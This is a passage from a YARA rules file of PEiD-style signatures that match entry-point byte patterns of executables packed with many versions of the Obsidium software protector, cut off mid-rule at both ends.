?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 CF 27 00 00 }\r\n        $b = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 28 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 03 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_1333_Obsidium_Software_SignByhaggar: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 28 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 58 EB 01 ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 2B 27 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1337_20070623_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 27 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 23 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 02 ?? ?? 33 C0 EB 01 ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 04 ?? ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 01 ?? E8 F7 26 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v10059_Final_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 AB 1C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1250_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 0D 33 C0 C3 64 67 FF 36 00 00 64 67 89 26 00 00 50 33 C0 8B 00 C3 E9 FA 00 00 00 E8 D5 FF FF FF 58 64 67 8F 06 00 00 83 C4 04 E8 2B 13 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_13017_Obsidium_software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 28 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1342_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_13037_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 26 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 01 ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1341_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2A 00 00 00 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 21 EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 02 ?? ?? E8 C3 27 00 00 }\r\n        $b = { EB 01 ?? E8 2A 00 00 00 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 21 EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_1258_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 29 00 00 00 EB 02 ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 01 ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? EB 01 ?? 58 EB 01 ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 01 ?? E8 7B 21 00 00 }\r\n        $b = { EB 01 ?? E8 29 00 00 00 EB 02 ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_v1304_Obsidium_Software_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1258_V133X_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 ?? 00 00 00 EB 02 ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1258_V133X_Obsidium_Software_Sign_by_fly: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 ?? 00 00 00 EB 02 ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v13037_Obsidium_Software_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 26 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1333_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 29 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1352_Obsidium_Software_SignByfly: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 25 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 01 ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 03 ?? ?? ?? E8 }\r\n        $b = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 25 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_V1355_Obsidium_Software_20080411: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2B 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 23 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 02 ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 ?? ?? ?? ?? EB 01 ?? E8 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? EB 01 ?? 58 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 01 ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1352_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 25 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_10069_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 A3 1C 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1300_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 25 80 34 CA E8 29 00 00 00 EB 02 C1 81 EB 01 3A 8B 54 24 0C EB 02 32 92 83 82 B8 00 00 00 22 EB 02 F2 7F 33 C0 EB 04 65 7E 14 79 C3 EB 04 05 AD 7F 45 EB 04 05 65 0B E8 64 67 FF 36 00 00 EB 04 0D F6 A8 7F 64 67 89 26 00 00 EB 04 8D 68 C7 FB EB 01 6B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1333_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 8B ?? 24 0C EB 01 ?? 83 ?? B8 00 00 00 28 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1338_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 ?? EB 04 ?? ?? ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 01 ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 57 27 00 00 }\r\n        $b = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 ?? EB 04 ?? ?? ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 01 ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_1337_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 2C 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 27 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 EB 02 ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1337_20070620_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 2C 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 27 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 EB 02 ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1304_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 01 ?? 33 C0 EB 01 ?? 8B 00 EB 01 ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 01 ?? E8 3B 26 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V125_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 0D 33 C0 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1304_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 ?? 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_vxxxx_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 47 19 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1250_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V12_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 77 1E 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1258_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 ?? 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_vxxxx: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 5D 01 ?? ?? CE D1 CE CE 0D 0A 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 0D 0A 2D 20 4F 52 69 45 }\r\n        $b = { E8 47 19 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_v10061: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 47 }\r\n        $b = { E8 AF 1C 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_13013_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 26 00 00 00 EB 02 ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 21 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 01 ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 02 ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 01 ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 02 ?? ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 03 ?? ?? ?? E8 13 26 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_13013_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 26 00 00 00 EB 02 ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 21 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 01 ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 02 ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 01 ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 02 ?? ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 03 ?? ?? ?? E8 13 26 00 00 }\r\n        $b = { EB 01 ?? E8 26 00 00 00 EB 02 ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 21 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 01 ?? 33 C0 EB 03 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_V1322_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 27 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 22 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1300_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 29 00 00 00 EB 02 ?? ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 22 EB 02 ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 01 ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 01 ?? E8 D5 FF FF FF EB 02 ?? ?? EB 03 ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 02 ?? ?? E8 47 26 00 00 }\r\n        $b = { EB 04 25 80 34 CA E8 29 00 00 00 EB 02 C1 81 EB 01 3A 8B 54 24 0C EB 02 32 92 83 82 B8 00 00 00 22 EB 02 F2 7F 33 C0 EB 04 65 7E 14 79 C3 EB 04 05 AD 7F 45 EB 04 05 65 0B E8 64 67 FF 36 00 00 EB 04 0D F6 A8 7F 64 67 89 26 00 00 EB 04 8D 68 C7 FB EB 01 6B }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_V1200_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 3F 1E 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1300_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 83 A4 BC CE 60 EB 04 80 BC 04 11 E8 00 00 00 00 81 2C 24 CA C2 41 00 EB 04 64 6B 88 18 5D E8 00 00 00 00 EB 04 64 6B 88 18 81 2C 24 86 00 00 00 EB 04 64 6B 88 18 8B 85 9C C2 41 00 EB 04 64 6B 88 18 29 04 24 EB 04 64 6B 88 18 EB 04 64 6B 88 18 8B 04 24 EB 04 64 6B 88 18 89 85 9C C2 41 00 EB 04 64 6B 88 18 58 68 9F 6F 56 B6 50 E8 5D 00 00 00 EB FF 71 78 C2 50 00 EB D3 5B F3 68 89 5C 24 48 5C 24 58 FF 8D 5C 24 58 5B 83 C3 4C 75 F4 5A 8D 71 78 75 09 81 F3 EB FF 52 BA 01 00 83 EB FC 4A FF 71 0F 75 19 8B 5C 24 00 00 81 33 50 53 8B 1B 0F FF C6 75 1B 81 F3 EB 87 1C 24 8B 8B 04 24 83 EC FC EB 01 E8 83 EC FC E9 E7 00 00 00 58 EB FF F0 EB FF C0 83 E8 FD EB FF 30 E8 C9 00 00 00 89 E0 EB FF D0 EB FF 71 0F 83 C0 01 EB FF 70 F0 71 EE EB FA EB 83 C0 14 EB FF 70 ED }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1311_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 27 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 22 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 01 ?? 8B 00 EB 03 ?? ?? ?? C3 EB 01 ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 03 ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1341_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2A 00 00 00 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 21 EB 02 ?? ?? 